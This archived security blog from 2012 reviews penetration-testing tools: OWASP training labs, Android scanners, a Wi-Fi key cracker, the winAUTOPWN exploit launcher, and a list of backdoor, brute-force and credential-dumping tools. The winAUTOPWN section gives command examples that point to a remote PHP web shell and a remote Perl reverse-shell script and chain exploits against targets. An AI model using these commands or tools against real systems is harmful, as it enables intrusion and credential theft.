Sunday, December 23, 2012

OWASP - Web Security Training

OWASP - Open Web Application Security Project :

OWASP is an open-source application security project. The OWASP community includes corporations, educational organizations, and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies.


OWASP Testing Guide :

January 2004
–"The OWASP Testing Guide", Version 1.0

July 14, 2004
–"OWASP Web Application Penetration Checklist", Version 1.1



Download Link : OWASP Ver 1.1


December 25, 2006
–"OWASP Testing Guide", Version 2.0
Download Link MS-DOC Format : OWASP Ver 2.0
Download Link PDF Format : OWASP Ver 2.0

15th September, 2008
–"OWASP Testing Guide", Version 3.0

Download Link MS-PPT Format : OWASP Ver 3.0
Download Link PDF Format : OWASP Ver 3.0

Video Tutorials :

OWASP AppSec Basics :


OWASP SQL Injection :
OWASP Cross Site Scripting :

OWASP Strict Transport Security :

Setting Up OWASP Web Security Learning Lab with OWASP ZAP :


Installation

Required Software

 Setup

  1. Install VirtualBox
  2. Unzip OWASP Broken Web Apps VM into any directory (don't pick restricted directories that require admin or sudo to access)
  3. Open VirtualBox and hit the icon for "New"
    • VM Name and OS Type: Enter name "OWASP-BWA" and select OS "Linux" and Version "Ubuntu"
    • Memory: Default of 512 is fine
    • Virtual Hard Disk: Important: select "Use existing hard disk" and click on the folder.
    • Browse to the unzipped folder contents of the OWASP Broken Web Apps VM. Select "OWASP Broken Web Apps.vmdk" Note: There are similar files ending in -s001. Don't pick those.
    • Click OK to finish VM Setup
  4. Right click on OWASP-BWA in the left pane of the Oracle VM VirtualBox Manager App and select "Settings" (also available via menu Machine->Settings)
    • Go to Settings->Network->Adapter 1.
    • Make sure the checkmark for enabled is checked.
    • Change "Attached to:" from "NAT" to "Host-Only Adapter"
    • Click OK
  5. Right click on OWASP-BWA in the left pane of the Oracle VM VirtualBox Manager App and hit "Start"
  6. After the VM boots the OWASP-BWA login page will provide the following message (the IP address will be similar but not exactly this)

  7. You can access the web apps at http://192.168.56.101

  8. Open a browser on your main machine (not the VM) and go to this URL. It should load a page that starts with "OWASP Broken Web Applications"
  9. Note: You don't need to actually login to the virtual machine. Everything is already running.

Common Errors

  • Boot Up Error Message - Kernel requires feature on CPU: pae
    • Power off VM (not VirtualBox, just VM window)
    • Right click on OWASP-BWA on left side and select "Settings" (also available via menu Machine->Settings)
    • Go to System->Processor and enable PAE
    • Click OK and restart VM
  • Host Only Adapter Shows Error Message and Name says "not selected" with no options
    • Go to the VirtualBox Manager (e.g. the main virtualbox control app, not the individual vm)
    • Go to the VirtualBox->Preferences and then select "Network" (note: these are settings for the virtualbox app overall)
    • There is a text box with the title "Host-only Networks:". It is most likely an empty text area, and this is the problem
    • Click the plus icon on the right to add a new adapter. You should now see "vboxnet0"
    • Click ok and then go back to the VMs preferences. You should be able to select the hostonly adapter now
  • Keyboard and mouse trapped in VM
    • Mac: Hit the left command button to exit VM control
    • Windows: Left Alt??
    • Simply click back inside the vm with the mouse to regain keyboard control in the VM
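The setup and troubleshooting steps above can also be scripted with VirtualBox's VBoxManage command line. This is an added example, not part of the original post; it assumes VBoxManage is on PATH, a host-only interface named vboxnet0, a storage controller named "SATA", and the helper function names are hypothetical. Before starting the deliberately vulnerable VM it also checks that no adapter is still attached to NAT or a bridged network.

```sh
#!/bin/sh
# Added example: VBoxManage equivalent of the GUI setup steps for the OWASP-BWA VM.
# Assumptions: VBoxManage on PATH, host-only interface vboxnet0, controller "SATA".

VM_NAME="OWASP-BWA"
VMDK_NAME="OWASP Broken Web Apps.vmdk"
HOSTONLY_IF="${HOSTONLY_IF:-vboxnet0}"

# run CMD...: print the command when DRY_RUN=1, otherwise execute it.
run() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# check_vmdk PATH: accept only the descriptor .vmdk, not the -s001 style extent files.
check_vmdk() {
    case "$1" in
        *-s[0-9][0-9][0-9].vmdk)
            echo "extent file, pick the descriptor .vmdk instead: $1" >&2
            return 1 ;;
    esac
    [ -f "$1" ] || { echo "not found: $1" >&2; return 1; }
    printf '%s\n' "$1"
}

# ensure_hostonly_if: create a host-only interface if the expected one is missing
# (the "not selected" error listed under Common Errors).
ensure_hostonly_if() {
    if [ "${DRY_RUN:-0}" != "1" ] &&
       VBoxManage list hostonlyifs | grep -q "^Name:[[:space:]]*$HOSTONLY_IF\$"; then
        return 0
    fi
    run VBoxManage hostonlyif create
}

# setup_vm VMDK: create the VM with 512 MB RAM, PAE enabled, adapter 1 host-only,
# and the existing disk attached.
setup_vm() {
    run VBoxManage createvm --name "$VM_NAME" --ostype Ubuntu --register &&
    run VBoxManage modifyvm "$VM_NAME" --memory 512 --pae on \
        --nic1 hostonly --hostonlyadapter1 "$HOSTONLY_IF" &&
    run VBoxManage storagectl "$VM_NAME" --name SATA --add sata &&
    run VBoxManage storageattach "$VM_NAME" --storagectl SATA --port 0 --device 0 \
        --type hdd --medium "$1"
}

# nic_exposure: read `VBoxManage showvminfo --machinereadable` output on stdin and
# print every adapter attached to anything other than host-only (or disabled).
nic_exposure() {
    grep -E '^nic[0-9]+=' | grep -Ev '="(hostonly|none)"$' || true
}

# main DIR: DIR is the folder the OWASP Broken Web Apps archive was unzipped into.
main() {
    vmdk=$(check_vmdk "$1/$VMDK_NAME") || return 1
    ensure_hostonly_if || return 1
    setup_vm "$vmdk" || return 1
    if [ "${DRY_RUN:-0}" != "1" ]; then
        exposed=$(VBoxManage showvminfo "$VM_NAME" --machinereadable | nic_exposure)
        if [ -n "$exposed" ]; then
            echo "refusing to start, adapter not host-only: $exposed" >&2
            return 1
        fi
        VBoxManage startvm "$VM_NAME"
    fi
}

# Entry point: "plan DIR" prints the commands, "apply DIR" runs them.
case "${1:-}" in
    plan)  DRY_RUN=1; main "${2:-.}" ;;
    apply) DRY_RUN=0; main "${2:-.}" ;;
esac
```

Run it with `plan <unzipped-folder>` first to review the commands, then with `apply <unzipped-folder>`.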

Training PDF : Click Here 

OWASP WebScarab Proxy Training : 

                 
                                      WebScarab is a framework for analysing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.

Download

Windows : Click Here or Alternate Link Click Here

Linux: java -jar ./webscarab-selfcontained-[numbers].jar

Video Training Click Here: http://yehg.net 

Sample Video : 


OWASP Webgoat Training :

                                    WebGoat is a deliberately insecure J2EE web application designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson. 

Download Link : WebGoat V 5.4


Training Documentation :

References to WebGoat documentation or solutions.

Sample Video : 





Hacking-Lab is providing the FREE OWASP TOP 10 hands-on lab as a service to the OWASP Academy Portal and to the OWASP community. This training material is reviewed and approved by the OWASP Academy Portal Project members in order to set and maintain an OWASP-worthy training quality.

Installation :

These are the simple steps I followed on a Windows 7 laptop.


  • Download the Virtual Appliance OVA file to your laptop
  • Download and install the Oracle Virtual Box application onto your laptop
  • Double-click the .ova file through Windows Explorer and the appliance import process should commence on the Virtual Box application. You should see something like Fig 1:
Fig. 1: Oracle VM Virtual Box Manager
  • In the Virtual Box Manager left-hand pane double-click on the LiveCD-Hacking-Lab-V5.55 entry. The LiveCD should start and after a short while the Welcome screen as shown in Fig 2 should appear.
Fig 2: Welcome Screen
You should be ready to go now at the OWASP Security Training.


Training Videos - Hacking_Lab LiveCD

Video Description | Details
How to use 2 different (attacker/victim) browser instances | Learn how to use 2 different (attacker/victim) browser instances (The Firefox Profiles are available on LiveCD V5.83 and newer)
How to use the ZAP browser in the LiveCD | Tutorial; ZAP Web Inspection Proxy on LiveCD
How to setup a landing page on the LiveCD | Tutorial; ZAP Web Inspection Proxy on LiveCD
How to import LiveCD in VirtualBox | Learn how to import the LiveCD ova file into VirtualBox
How to import LiveCD in VMware | Learn how to import the LiveCD ova file into VMware
Run Hacking-Lab LiveCD with Vmware 8 workstation | Learn how to use the LiveCD ISO with Vmware 8 workstation
Installation of LiveCD in Vmware 8 workstation | Learn how to install the LiveCD ISO in your Vmware 8 workstation
How to open a root shell | Learn how to open a "root" shell
Server side VDI solution | Learn how to use the server side VDI solution

Hacking-Lab Download 

Documents and Videos
Hacking-Lab LiveCD

Thursday, December 20, 2012

Android Application Vulnerability / Security Assessment Tools & Framework

Android Security Evaluation Framework (ASEF) :
                                               performs this analysis while alerting you about other possible issues. It will make you aware of unusual activities of your apps, will expose vulnerable components and help narrow down suspicious apps for further manual research. The framework will take a set of apps (either pre-installed on a device or as individual APK files) and migrate them to the test suite where it will run it through test cycles on a pre-configured Android Virtual Device (AVD).

ASEF is an Open Source project to perform security analysis of Android apps by various security measures.

                            ASEF is an Open Source tool for scanning Android Devices for security evaluation. Users will gain access to security aspects of android apps by using this tool with its default settings. An advanced user can fine-tune this, expand upon this idea by easily integrating more test scenarios, or even find patterns out of the data it already collects. ASEF will provide automated application testing and facilitate a plug and play kind of environment to keep up with the dynamic field of Android Security.

YouTube Videos :

Demo : Running ASEF to test all installed android apps from an android device on an Android Virtual Device



Short Demo : Running ASEF to test all installed android apps from an android device on an another physical android device

 

Download Link : Android Security Evaluation Framework


Tools :

Mercury v1.1 Tool - 

bug hunters to find vulnerabilities & write proof-of-concept exploits in Android applications. Simply called an Android Apps Vulnerability Scanner.

 

                            Mercury is a framework for exploring the Android platform; to find vulnerabilities and share proof-of-concept exploits.

                         Mercury allows you to assume the role of a low-privileged Android app, and to interact with both other apps and the system.
  • Use dynamic analysis on Android applications and devices for quicker security assessments
  • Share publicly known methods of exploitation on Android and proof-of-concept exploits for applications and devices
  • Write custom tests and exploits, using the easy extensions interface
Mercury allows you to:
  1. Interact with the 4 IPC endpoints - activities, broadcast receivers, content providers and services
  2. Use a proper shell that allows you to play with the underlying Linux OS from the point of view of an unprivileged application (you will be amazed at how much you can still see)
  3. Find information on installed packages with optional search filters to allow for better control
  4. Use built-in commands that can check application attack vectors on installed applications
  5. Transfer files between the Android device and your computer
  6. Create new modules to exploit your latest finding on Android, and play with those that others have found
                For those of you interested in vulnerabilities in vendor products, the new version is the start of a collection of these in a framework. The first privilege escalation was included, allowing the escalation to root from Mercury’s unprivileged context. A module was created to check for vulnerabilities in content providers discovered on Samsung devices.

Sample results of running this module on a vulnerable version of the Samsung Galaxy SII are shown below:


Running this on the Samsung Galaxy SIII yields the following:

                               

Security consultants Sample Testing :

The first set of vulnerabilities found by the MWR team was done manually by reviewing the AndroidManifest.xml of each package on the phone. With Mercury, a combination of the attacksurface command and the info command in each section will get you the same results in a tenth of the time. If you are interested in looking for common problems on devices, the scanner modules will be of interest to you. As an example, this is scanner.provider.sqlinjection finding SQL injection flaws in default content providers on an Android 4.0.3 Emulator.



                        Don’t get too excited, these SQL injection vulnerabilities don’t lead to any serious information disclosure, but you get the idea right? Don’t just look at content provider problems because these tools are available. Content providers are the tip of the iceberg! Ask us questions or bounce ideas. Create new modules with Mercury. Go forth and innovate!

   Download Link : Mercury v1.1

 

 





Wednesday, December 19, 2012

Fern Wifi Cracker - Wireless Penetration Testing Tool

Fern Wifi Cracker :
is a wireless security auditing and attack software program written using the Python programming language and the Python Qt GUI library. The program is able to crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet-based networks.

                          

Features


Fern Wifi Cracker currently supports the following features:
  • WEP Cracking with Fragmentation,Chop-Chop, Caffe-Latte, Hirte, ARP Request Replay or WPS attack
  • WPA/WPA2 Cracking with Dictionary or WPS based attacks
  • Automatic saving of key in database on successful crack
  • Automatic Access Point Attack System
  • Session Hijacking (Passive and Ethernet Modes)
  • Access Point MAC Address Geo Location Tracking
  • Internal MITM Engine
  • Bruteforce Attacks (HTTP,HTTPS,TELNET,FTP)
  • Update Support

Operating System Supported

The software runs on any Linux machine with the program's prerequisites, but the program has been tested on the following Linux-based operating systems:

Prerequisites

The Program requires the following to run properly:
The following dependencies can be installed using the Debian package installer command on Debian based systems using "apt-get install program" or otherwise downloaded and installed manually

    Installation

    Installation on Debian Package supported systems:

    root@host:~# dpkg -i Fern-Wifi-Cracker_1.6_all.deb



    Screenshot :

    Aim 

    • Crack the Wifi using Fern Wifi Cracker . 

    HOW TO OPEN FERN-WIFI-CRACKER

    • To open fern , follow the steps - 
    • Backtrack > Exploitation Tools > Wireless Exploitation Tools >WLAN Exploitation >fern-wifi-cracker 
    • See the below image for more details - 

    SELECT INTERFACE

    • First step is to select the interface .
    • Here in my case I have selected the wlan0 interface.
    • See the below image for more details - 
    SCANNING ACCESS POINT 
    • To scan for Access Point click on the 2nd button ( wifi icon ).
    • See the below image for more details -
    • Once you get the Access Point , various AP's of WEP and WPA are detected .
    • See the below image for more details-

     

    WPA Cracking with WPS Attack:

    Video Tutorial :

    Session Hijacking With Fern Wifi Cracker


    Bruteforcing Routers with Fern-Wifi-Cracker


     
    Download Link : Click Here

    Tuesday, December 18, 2012

    Arachni - Web Application Security Scanner Framework

    Arachni :
                is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process.
    Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling through the paths of a web application’s cyclomatic complexity.

    This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.








    Currently available modules:

    • Audit:
      • SQL injection
      • Blind SQL injection using rDiff analysis
      • Blind SQL injection using timing attacks
      • CSRF detection
      • Code injection (PHP, Ruby, Python, JSP, ASP.NET)
      • Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
      • LDAP injection
      • Path traversal
      • Response splitting
      • OS command injection (*nix, Windows)
      • Blind OS command injection using timing attacks (*nix, Windows)
      • Remote file inclusion
      • Unvalidated redirects
      • XPath injection
      • Path XSS
      • URI XSS
      • XSS
      • XSS in event attributes of HTML elements
      • XSS in HTML tags
      • XSS in HTML ‘script’ tags
    • Recon:
      • Allowed HTTP methods
      • Back-up files
      • Common directories
      • Common files
      • HTTP PUT
      • Insufficient Transport Layer Protection for password forms
      • WebDAV detection
      • HTTP TRACE detection
      • Credit Card number disclosure
      • CVS/SVN user disclosure
      • Private IP address disclosure
      • Common backdoors
      • .htaccess LIMIT misconfiguration
      • Interesting responses
      • HTML object grepper
      • E-mail address disclosure
      • US Social Security Number disclosure
      • Forceful directory listing




    Sample Report :






    To scan via the user-friendlier Web User Interface, just run:

    arachni_web_autostart
     
    This will set up a Dispatcher and fire up the WebUI server for you.

    Then, point your browser to http://localhost:4567, accept the default settings and start the scan.



    Download Link : Click Here


    Wednesday, December 12, 2012

    winAUTOPWN - Automated Vulnerability Testing

    WinAUTOPWN: 

                           is a minimal Interactive Exploit Framework which acts as a frontend for quick systems vulnerability exploitation. It is a collection of remote exploits using which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and exploits applicable to those ports are executed with the aim of gaining a remote shell or the ability to run remote commands in certain cases.


    WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining // security penetration tool. It can also be used to test IDS, IPS and other monitoring sensors/software.


    Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various operating systems like Microsoft Windows, Apple MAC OSX, Linux (various), BSD systems as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly, and this can aid in checking whether the WAF is preventing / alerting accordingly against such threats or not. Similarly, shell aiming exploits too can be fired up in a row to test the strength and effectiveness of IDS and IPS.

    WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by the Operating System. Like winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We’ll come to a detailed discussion about bsdAUTOPWN later.



     
    Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:


    How to use command-line in winAUTOPWN ?

    Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :
    • -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.
      Example winAUTOPWN.exe -skipscan
    • -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts.
      Example winAUTOPWN.exe -onlyscan
    • -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.
      Example winAUTOPWN.exe -targetIP 192.168.3.3
    • -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.
      Example winAUTOPWN.exe -targetHOST SYSTEM-2
      winAUTOPWN.exe -targetHOST www.somewebsite9.com
    • -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.
      Example winAUTOPWN.exe -attackerIP 192.168.3.34
    • -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe -cmsPATH /xampp
    • -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe -actcmsPATH /Applications/xampp
      winAUTOPWN.exe -actcmsPATH /opt/xampp
    • -phpshellPATH This option can be used to specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=ls
      You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe -phpshellPATH http://website.moc/folder/r57.txt
    • -actphpshellPATH This option can be used to specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe -actphpshellPATH /var/log/tmp
    • -cmsadminUSR This option can be used to specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.
      Example winAUTOPWN.exe -cmsadminUSR admin9
    • -ftpUSR This option can be used to specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.
      Example winAUTOPWN.exe -ftpUSR user6
    • -ftpPASSWD This option can be used to specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.
      Example winAUTOPWN.exe -ftpPASSWD S3cR37P@55W0rD
    • -perlrevshURL This option can be used to specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perl . Note that the remote_IP will be your IP to which your target will connect and the remote_port will be a port opened on your IP. You do not have to worry about providing parameters to the Perl file or opening the port locally, winAUTOPWN will automatically handle it, because that’s what WINDOWS AUTOPWN actually means. Also note that any Perl script with these capabilities can be used and can be hosted on any webserver. This option just needs the path to this Perl file. This Perl script will be pointed to and used in a few exploits in which a remote connect back shell is used as a payload. There is a default Perl shell path encoded so if you have no clue or an online resource, you can leave this option blank and winAUTOPWN will try to handle it on its own.
      Example winAUTOPWN.exe -perlrevshURL http://website.moc/various/reverse-shell.pl
    • -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is always root@ where target hostname is the -targetHOST provided earlier. You can set a value to this field to override the default value set.
      Example winAUTOPWN.exe -mailFROM admin@some.web.info
    • -mailTO This option can be used to specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is always postmaster@ where target hostname is the -targetHOST provided earlier. You can set a value to this field to override the default value set.
      Example winAUTOPWN.exe -mailTO postmaster@some.web.info
    • -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies, and only if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.
      Example winAUTOPWN.exe -proxyIP 192.168.3.80
    • -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies, and only if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number after it.
      Example winAUTOPWN.exe -proxyPORT 8080


      What are the other WELF Scripting Terminologies?

      can be , , OR (for exe files)
      is the filename of the Exploit. Ex: exploitname.exe
      is your Target’s IP address. Ex: 10.40.140.1
      is your Target’s Hostname. Ex: www.somegate.com OR TSUNAMI-MP11
      is your IP. Ex: 10.40.140.144
      is the Target CMS Path. Ex: /awstats
      is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats
      is an online URL for a php shell. Ex: http://www.shell.com/phpshell.txt
      is an admin username for the Target CMS.
      is FTP/CMS Username
      is FTP/CMS Password.
      is Proxy IP address to be used for some exploits to pass through
      is Proxy Port Number to be used for some exploits to pass through
      is the CMS Path with a trailing slash. Ex: /awstats/
      is the Actual CMS Path on the disk with a trailing slash. Ex: /usr/home/www/awstats/
      is the typical complete address of the Target Hostname along with the CMS Path. Ex: www.somesite.com/awstats
      is the typical complete address of the Target Hostname along with the CMS Path with a trailing slash. Ex: www.somesite.com/awstats/
      is the CMS path following the standard http:// . Ex: http://www.somesite.com/awstats
      is the Target HostName following the standard http:// . Ex: http://www.somesite.com
      is the online URL for a perl reverse connect script. Ex. http://vrac.fifi.be/warehouse/various/reverse-shell.pl
      is the sender’s email address to be used in a few SMTP exploits.
      is the receiver’s email address to be used in a few SMTP exploits.
      Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
      PERL webframe_0.76_RFI(c99)-xplt_method3.pl -vuln -shell ^^^^
      PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py 80 100 ^^^^
      bitweaver_firecmd.exe ^^^^

      To run the above script, as mentioned earlier run
      winAUTOPWN.exe -welf myWELFexploits.txt


    Download Link : Click Here

    Back-up Link : Click Here

    Reference link : Click Here

    Direct Link : Click Here

    ScoopyNG - VMware detection tool

    ScoopyNG:
                 combines the detection tricks of Scoopy Doo and Jerry as well as some new techniques to determine if a current OS is running inside a VMware Virtual Machine (VM) or on a native system.

    ScoopyNG should work on all modern uni-, multi- and multi-core CPUs.




    ScoopyNG is able to detect VMware even if "anti-detection-mechanisms" are deployed.

    Download : 
                     Windows Version: ScoopyNG v1.0

    Wednesday, October 17, 2012

    ServerShield - Open Source Linux Hardening Tool

    Server Shield:
                is a lightweight method of protecting and hardening your Linux server. It is easy to install, hard to mess up, and makes your server instantly and effortlessly resistant to many basic and advanced attacks

    Automatic security updates are enabled by default, including the self-updating of Server Shield. If you are running a modified version of Server Shield you should turn self-updating off so your changes don't get overwritten. Support for servers with multiple IP addresses will be added soon.

    Features

    • Slowloris Protection
    • Firewall Hardening
    • TCP Hardening
    • ICMP/Ping Flood Protection
    • DoS Protection
    • Spoof Protection
    • FTP/SSH Bruteforce Protection
    • Automatic Security Updates
    • Disables Bash History
    • DNS Amplification Protection

    Installation

    git clone https://github.com/Brian-Holt/server-shield
    
    cd server-shield;chmod +x sshield;mv sshield /etc/init.d
    
    /etc/init.d/sshield start    
    

    Requirements

    Server Shield depends on several pieces of open source software to function properly. If yum is available, the following packages will be silently installed and kept up to date:
    • yum-security
    • iptables
    • nmap
    • net-tools
    • sed
    • gawk
    • git
    • apache-devel
     Download Link : Click Here

     Reference Link : Click Here

    Friday, August 24, 2012

    NmapSI4 - Port Scanner ( Nmap GUI )

    NmapSI4 :

    A Qt4-based GUI tool with the design goal of providing a complete Nmap GUI interface for users, in order to manage all options of this powerful network port and vulnerability scanner.









    Features


    • Traceroute support with Nmap
    • Host Lookup with internal implementation or dig.
    • Search services vulnerabilities with Webkit dedicated browser.
    • Full Nmap NSE support.
    • Search network IPS with "Network Discover" tool.
    • Support for creating scan user profiles.
    • Host scan with Nmap.

     Snapshots :





    Download Link :

    Google Code : Click Here
    Source Forge : Click Here

    Thanks To ALL .


    Sunday, August 19, 2012

    2012 - Information Security Free / open source Tools

    Information Security tools  List:

    You can find a lot of security tools on the internet. But it is hard to find the right tool for the right job. Here you will be able to download firewall analyzers and several security tools.
    If you believe we missed out on a security tool you can send us a message or simply post it as a comment.

    Real time protection

    Avast! Free
    Ad-Aware Free
    AVG Free
    Panda Cloud Free
    Avira free antivirus Free
    Microsoft Security Essentials Free
    Comodo Free
    Fprot (with Returnil) Free
    PC Tools Free Free
    FortiClient Lite Free
    Unthreat Antivirus Free
    Preventon Free
    Rising Free
    Zillya! Free
    NANO Free
    Digital Defender Free
    ClearSight Free
    Zoner Free
    BkavHome Free
    CMC Infosec Free
    Clam Sentinel Free
    Moon Secure Free
    ZenOK Free
    Ainvo Antivirus Free

    Portable anti-virus programs

    DrWeb cureit
    Emsisoft Emergency USB Stick files
    Avira DE-Cleaner
    Microsoft Safety Scanner
    AVZ / AVZ database
    Norman malware cleaner
    Superantispyware
    Panda ActiveScan Cleaner
    Trendmicro Sysclean
    NoVirusThanks
    ArcaVir MicroScan
    Zillya! Scanner
    Spybot Portable
    ClamWin Portable
    Guardiano Assembler

    Anti Root kit

    TDSS Killer
    Avast MBR Scanner
    Gmer
    RootRepeal
    Kernel Detective
    SpyDllRemover
    VBA anti-rootkit
    Sanity check
    Rootkit Unhooker
    Bitdefender Bootkit Removal Tool
    RootkitRemover
    mbr tool
    catchme
    Rootkitty
    Kill bootkits
    Hypersight Rootkit Detector
    Rkdetector

    Firewall analyzer

    Security is effective when you know what is going on in your environment. Most of us protect ourselves with firewalls, IDS, IPS and multiple monitoring tools.
    These devices and tools all create logfiles that can be analyzed to
    Software Free / Paid Download link
    Firemon Paid http://www.firemon.com
    Barracudanetworks Paid http://www.barracudanetworks.com
    Splunk Paid http://www.splunk.com

    Monitor tools

    If you want to monitor your environment you can use these monitor tools to find out what is happening in your environment.
    Software FREE / Paid Download link
    Zenoss Core Free http://community.zenoss.org/
    NTA Monitor Free http://www.nta-monitor.com/tools/ike-scan/

    Sniffers

    Do you need to analyze a packet? You can use these packet analyzers to sniff packets that cross your network. You can analyze network problems, detect network intrusion attempts and more.
    Software Free / Paid Download link
    Wireshark Free http://www.wireshark.org
    NMAP Free http://nmap.org/

    Code Review Tools

    Tools to review code.
    Software Free / Paid Download link
    Rough Auditing Tool for Security Free https://www.fortify.com

    Config Review Tools

    Tools to review config files.
    Software Free / Paid Download link
    Apache Benchmark Free http://www.cisecurity.org/
    Microsoft Best Practice Analyzer Paid http://www.microsoft.com

    Database Tools

    Software Free / Paid Download link
    SQL Server Express Utility Free http://www.microsoft.com
    MySQL Command-Line Tool Free http://dev.mysql.com/
    Leviathan Free http://leviathan.sourceforge.net/
    WinSQL without installer Free http://web.synametrics.com/rawfiles.htm

    Debugging Tools

    Software Free / Paid Download link
    OllyDbg Free http://www.ollydbg.de/

    Forensic Tools

    Software Free / Paid Download link
    Mandiant Red Curtain Free http://www.mandiant.com/
    Mandiant Red Line Free http://www.mandiant.com/

    Fuzzer Tools

    Software Free / Paid Download link
    Skipfish Free http://code.google.com/p/skipfish/
    WSFuzzer Project Free https://www.owasp.org/
    FileFuzz Free http://www.securiteam.com/tools
    Fuzzdb Free http://code.google.com/p/fuzzdb/

    SAP tools

    Software Free / Paid Download link
    SAPYTO Free http://www.security-database.com/

    Backdoor Tools

    Software Free / Paid Download link
    TINI Free http://ntsecurity.nu/toolbox/tini/

    Brute Force Tools

    Software Free / Paid Download link
    Hydra Brute Force Utility Free http://www.madirish.net/
    BRUTUS Free http://www.hoobie.net/brutus/
    TSGrinder Free http://www.hammerofgod.com/
    Patator Free http://code.google.com/p/patator/

    Truecrack (password cracking for TrueCrypt encrypted volume files): click here

    Interception Tools

    Software Free / Paid Download link
    Echomirage Free http://www.bindshell.net/tools/

    Password Cracking Tools

    Software Free / Paid Download link
    Cain & Abel Free http://www.oxid.it/cain.html
    John the Ripper Free http://www.openwall.com/john/
    Ophcrack Free http://ophcrack.sourceforge.net/

    Password Retrieval Tools

    Have you lost your password and need to retrieve it? Then take a look at these password retrieval tools.
    Software Free / Paid Download link
    Creddump Free http://code.google.com/p/creddump/
    FGdump Free http://www.foofus.net/~fizzgig/fgdump/
    Pass-The-Hash toolkit Free http://oss.coresecurity.com/
    PWdump Free http://www.foofus.net/~fizzgig/pwdump/

    Token Impersonation Tools

    Software Free / Paid Download link
    Incognito Free http://sourceforge.net/projects/incognito/
    Pass-The-Hash toolkit Free http://oss.coresecurity.com/
    Windows Credentials Editor Free http://www.ampliasecurity.com/research.html

    Live CDs

    Software Free / Paid Download link
    Backtrack Free http://www.backtrack-linux.org/
    Hiren Free http://www.hiren.info/pages/bootcd

    Great Tool resources

    Software Free / Paid Download link
